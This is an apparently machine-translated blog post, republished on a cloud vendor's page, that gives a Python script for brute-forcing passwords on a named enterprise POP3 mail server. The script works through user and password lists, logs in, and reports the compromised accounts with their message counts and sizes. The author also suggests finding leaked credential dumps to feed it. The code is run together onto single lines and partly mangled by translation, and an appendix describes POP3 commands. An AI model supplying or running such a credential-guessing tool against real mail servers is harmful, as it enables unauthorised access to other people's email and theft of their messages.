Create a brute-force script for enterprise mail using python and a python enterprise mail

Source: Internet
Author: User
Tags email account

Create a brute-force script for enterprise mail using python and a python enterprise mail

According to the task given by the master, I wrote a brute-force password cracking script for the enterprise mailbox, followed by some brute-force scripts such as FTP and SSH.

Let me talk about the overall idea:

In general, the python poplib module is used to interact with the pop3 server and generate results based on the obtained information. The POP3 protocol is not complex. It also uses a Q & A method. If you send a command to the server, the server will reply to a message.

1. Verify that the parameters are correct.

Sys. argv [] is used to obtain command line parameters. sys. argv [0] indicates the file path of the code, so the parameter starts from 1.

2. Then read the information from the user password file.
3. pop. getwelcome () is used to obtain the response status of the connection server.
4. The core code of the script

Server = "pop.qiye.163.com" // set the pop3 server address pop = poplib. POP3 (server, 110) // connect to the pop3 server pop. user (user) // verify username auth = pop. pass _ (passwd) // verify the password if auth. split ('') [0] =" + OK ": // determine whether the response result is" OK "pring user, passwd

5. Finally, relevant user information is output.

The script code is as follows:

#! /Usr/bin/python #-*-coding: UTF-8-*-''' @ Author: joy_nick @ blog: http://byd.dropsec.xyz/@Email Pop3 Brute Forcer ''' import threading, time, random, sys, poplibfrom copy import copyif len (sys. argv )! = 3: print "\ t -------------------------------------------------- \ n" print "\ t Usage :. /Emailpopbrute. py <userlist> <passlist> \ n "sys. exit (1) server = "pop.qiye.163.com" success = [] try: users = open (sys. argv [1], "r "). readlines () handle T (IOError): print "[-] Error: failed to open urerlist! \ N "sys. exit (1) try: words = open (sys. argv [2], "r "). readlines () handle T (IOError): print "[-] Error: An Error occurred while enabling passlist! \ N "sys. exit (1) try: pop = poplib. POP3 (server, 110) welcome = pop. getwelcome () print welcome pop. quit () bought t (poplib. error_proto): welcome = "No Response" passdef mailbruteforce (listuser, listpwd): if len (listuser) <1 or len (listpwd) <1: print "An error occurred: no user or pass list "return 1 for user in listuser: for value in listpwd: user = user. replace ("\ n", "") value = value. replace ("\ n ","") Try: print "-" * 12 print "[+] User:", user, "Password:", value time. sleep (1) pop = poplib. POP3 (server, 110) pop. user (user) auth = pop. pass _ (value) print auth if auth. split ('') [0]! = "+ OK": pop. quit () print "unknown error! "Continue if pop. stat () [1] is None or pop. stat () [1] <1: pop. quit () print" failed to get information! "Continue ret = (user, value, pop. stat () [0], pop. stat () [1]) success. append (ret) pop. quit () break failed t: # print "An error occurred:", msg passprint "\ t ------------------------------------------------ \ n" print "[+] Server:", serverprint "[+] Port: 995 "print" [+] Users Loaded: ", len (users) print" [+] Words Loaded: ", len (words) print" [+] Server response :", welcome, "\ n" mailbruteforce (users, words) print "\ t [+] have weakpass: \ t", len (success) if len (success)> = 1: for ret in success: print "\ n [+] Login successful:", ret [0], ret [1] print "\ t [+] Mail :", ret [2], "emails" print "\ t [+] Size:", ret [3], "bytes \ n" print "\ n [-] Done"

Test results:

Note:

User dictionary files need @ domain.com, like zhangsan@domain.com, lisi@domain.com, wangwu@domain.com. Because I do not have an enterprise email account or password, the test is not successful. If you are interested, you can search for the relevant social engineering pants.

Appendix:

In python, what are the differences between OS. _ exit (), sys. exit (), and exit?

  1. Sys. exit (n) An SystemExit exception is thrown when you exit the program. You can capture exceptions and perform cleanup. the default value of n is 0, indicating normal exit. others are non-normal exits. if this exception is not captured, the system exits directly. You can clear the exception by capturing it. This is usually used in the main program to exit
  2. OS. _ exit (n): exit the Python interpreter directly. The subsequent code is not executed, no exception is thrown, and related cleanup is not performed. It is often used when the child process exits.
  3. Exit () is the same as exit () in other languages such as C.

The pop3 mail receiving process is generally:

  • Connect to the pop3 server (poplib. POP3. _ init __)
  • Send the user name and password for verification (poplib. POP3.user poplib. POP3.pass _)
  • Obtain the information about the email (poplib. POP3.stat)
  • Receive email (poplib. POP3.retr)
  • Delete an email (poplib. POP3.dele)
  • Exit (poplib. POP3.quit)

Command poplib method parameter status description
Bytes -----------------------------------------------------------------------------------------------
The USER user username recognizes the USER name. If this command is successful with the following pass Command, status conversion will occur.
PASS _ password
APOP apop Name, which is recognized by Digest as the MD5 message Digest
Bytes -----------------------------------------------------------------------------------------------
STAT stat None processes the mailbox statistics sent back by the request server, such as the total number of emails and total bytes.
UIDL uidl [Msg #] indicates the unique identifier of the Response Message. Each identifier of a POP3 session will be unique.
LIST list [Msg #] Number of returned mails processed and size of each email
RETR retr [Msg #] process and return all text of emails identified by Parameters
DELE dele [Msg #] The processing server marks the emails marked by parameters as deleted and is executed by the quit command.
RSET rset None processing server resets all emails marked as deleted, used to undo the DELE Command
TOP top [Msg #] The processing server will return the content of the first n lines of emails identified by parameters. n must be a positive integer.
NOOP noop None processing server returns a positive response

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.